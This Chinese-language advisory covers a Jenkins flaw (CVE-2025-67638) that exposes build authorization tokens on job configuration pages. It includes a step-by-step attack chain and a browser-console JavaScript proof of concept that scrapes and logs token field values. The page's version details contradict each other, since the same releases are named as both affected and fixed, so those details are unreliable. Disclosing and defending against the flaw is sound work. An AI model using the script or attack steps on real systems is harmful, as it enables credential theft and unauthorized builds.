CVE-2025-67638 Jenkins构建授权令牌未遮蔽信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-67638

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jenkins

漏洞概述

Jenkins 2.540及更早版本，以及LTS 2.528.2及更早版本存在一个信息泄露漏洞。该漏洞允许攻击者通过查看作业配置表单获取构建授权令牌。由于Jenkins在配置表单上显示构建授权令牌时未进行遮蔽处理（密码字段显示为明文或可见文本），具有作业配置查看权限的低权限用户可以观察到这些敏感凭证。攻击者利用获取的令牌可以提升权限，执行原本无权执行的构建操作，从而可能访问敏感资源或触发未授权的构建流程。此漏洞增加了凭证被盗取的风险，对系统的机密性造成潜在威胁。

技术细节

该漏洞属于UI信息泄露类问题。在Jenkins的作业配置页面中，构建授权令牌（Build Authorization Token）字段未被正确配置为密码类型或遮蔽显示。当用户在配置界面输入或查看令牌时，这些敏感信息以明文形式呈现。攻击者只需要具备作业配置的查看权限，即可通过浏览器开发者工具或页面源码获取到令牌明文。由于Jenkins的权限模型中查看作业配置不需要最高权限，攻击门槛相对较低。获取令牌后，攻击者可以利用Jenkins的远程API触发构建，实现权限提升。CVSS向量显示攻击复杂度低（AC:L），无需用户交互（UI:N），但需要低权限（PR:L），机密性影响为低（C:L）。

攻击链分析

STEP 1

步骤1

攻击者获得Jenkins作业配置页面的访问权限（需要低权限用户账号）

STEP 2

步骤2

攻击者导航到目标作业的配置页面，查看构建授权令牌字段

STEP 3

步骤3

由于令牌未遮蔽显示，攻击者可以直接看到明文令牌或通过开发者工具获取input字段值

STEP 4

步骤4

攻击者利用获取的令牌通过Jenkins API远程触发构建

STEP 5

步骤5

成功以更高权限用户的身份执行构建操作，实现权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-67638 PoC - Jenkins Build Authorization Token Exposure
// This PoC demonstrates how to extract exposed build tokens from Jenkins job config pages

(async function() {
    console.log('[+] CVE-2025-67638 PoC - Jenkins Token Exposure Check');
    
    // Check if on Jenkins page
    if (!window.location.href.includes('configure')) {
        console.log('[-] Please navigate to a Jenkins job configuration page');
        return;
    }
    
    // Find build token input fields that are not properly masked
    const inputs = document.querySelectorAll('input[type="text"], input:not([type="password"])');
    const tokenFields = [];
    
    inputs.forEach(input => {
        const name = input.name || '';
        const id = input.id || '';
        const label = document.querySelector('label[for="' + input.id + '"]')?.textContent || '';
        
        // Look for token-related fields
        if (name.toLowerCase().includes('token') || 
            id.toLowerCase().includes('token') ||
            label.toLowerCase().includes('token')) {
            tokenFields.push({
                name: name,
                id: id,
                value: input.value,
                type: input.type
            });
        }
    });
    
    if (tokenFields.length > 0) {
        console.log('[!] Exposed token fields found:');
        tokenFields.forEach(field => {
            console.log('Field:', field.name, 'Value:', field.value, 'Type:', field.type);
        });
        console.log('[+] PoC demonstrates CVE-2025-67638 vulnerability');
    } else {
        console.log('[-] No exposed token fields found');
    }
})();

影响范围

Jenkins < 2.540

Jenkins LTS < 2.528.2

防御指南

临时缓解措施

在官方补丁发布前，应限制对作业配置页面的访问权限，仅允许必要的管理员用户访问。同时监控Jenkins访问日志，关注异常的作业配置访问行为。建议尽快升级到Jenkins 2.540或LTS 2.528.2版本以修复此漏洞。